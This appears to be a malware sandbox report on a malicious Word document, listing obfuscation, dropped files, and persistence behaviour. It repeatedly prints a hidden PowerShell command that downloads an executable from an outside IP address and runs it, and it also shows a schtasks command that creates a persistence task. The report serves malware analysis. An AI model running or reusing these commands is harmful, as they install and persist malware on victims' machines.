                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.drInitial sample: OLE indicators vbamacros = False

                    Data Obfuscation:

                    barindex
                    .NET source code contains potential unpackerShow sources
                    Source: taskmg[1].exe.0.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: taskmg.exe.3.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: gZfDBpJYZ.exe.9.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 9.0.taskmg.exe.12d0000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 9.2.taskmg.exe.12d0000.1.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Suspicious powershell command line foundShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 9_2_002B12BB push esp; retn 001Ch9_2_002B1321
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 9_2_002B3654 push esp; retn 001Ch9_2_002B3655
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00C4FDE5 push ebp; ret 14_2_00C4FDE7
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00C4FD95 push ebp; ret 14_2_00C4FD97
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeCode function: 14_2_00C4FD46 push ebp; ret 14_2_00C4FD47
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.79660930856
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.79660930856
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.79660930856

                    Persistence and Installation Behavior:

                    barindex
                    Tries to download and execute files (via powershell)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\taskmg[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeFile created: C:\Users\user\AppData\Roaming\gZfDBpJYZ.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\taskmg.exeJump to dropped file

                    Boot Survival:

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
